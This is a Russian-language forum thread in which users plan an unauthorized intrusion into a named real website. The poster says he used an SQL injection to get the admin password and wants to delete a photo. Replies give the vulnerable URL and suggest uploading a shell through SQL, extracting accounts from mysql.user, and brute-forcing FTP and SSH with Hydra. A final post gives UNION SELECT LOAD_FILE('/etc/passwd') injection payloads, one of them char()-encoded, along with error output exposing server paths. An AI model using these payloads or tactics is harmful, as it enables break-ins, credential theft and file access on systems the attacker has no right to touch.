![]() |
Требуется помощь
Есть сайт dezinfo.net
Нашел инъект, раскрутил на админский пасс. Но вот не задача, админка у них не работает (можете проверить dezinfo.net/administrator/). Куда еще копать??? Мне нужно из статьи убрать фото, пренадлежащее заказчику. |
http://dezinfo.net/login.php - а если зайти под логином админа с этой странички думаешь удалить фото нельзя которое ты хочешь )
|
http://dezinfo.net/tests/test_go.php?test_id=10&step=0
|
> http://dezinfo.net/login.php - а если зайти под логином админа с этой странички думаешь удалить фото нельзя которое ты хочешь )
На сколько я изучил сайт, залогинившись под админом - нет. Не дает. > http://dezinfo.net/tests/test_go.php?test_id=10&step=0 Дыра именно тут. |
попробуй под админским акком зайти по ftp или ssh. У меня иногда прокатывало =)
|
К сожалению не прокатывает ни то, ни другое..
|
Пробуй залить через скуль шелл или вытянуть акк админа из mysql.user или почитать файлы (сорри если советы бесполезны ибо баг покрутить времени нет) Так же можешь попробовать гидрой сбрутить пассы от тех же ftp и ssh но палевно получиться.
|
Пробуй залить через скуль шелл или вытянуть акк админа из mysql.user или почитать файлы (сорри если советы бесполезны ибо баг покрутить времени нет) Так же можешь попробовать гидрой сбрутить пассы от тех же ftp и ssh но палевно получиться.
Там стоит MySQL 4 Можешь дать ссылку на статью по твоим советам??? |
Всю необходимую инфу ты найдешь поиском по этому форуму. Ищи SQL injection (найдешь отличные статьи) да и по гидре думаю то же что-нибудь будет.
|
Еще вопрос:
site.ru/?cat=1%20union%20select%201,LOAD_FILE('/etc/passwd'))/* Выкидывает с ошибкой Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/flyfishing.spb.su/httpdocs/index.php on line 201 Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/flyfishing.spb.su/httpdocs/cat.php on line 8 Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/flyfishing.spb.su/httpdocs/cat.php on line 23 Но запрос вида site.ru/?cat=1%20union%20select%201,LOAD_FILE(char(39,47,1 01,116,99,47,112,97,115,115,119,100,39))/* Ошибок не выдает, но и файл не показывает. Я где то ошибаюсь, или файл нельзя прочесть? |
| Время: 23:58 |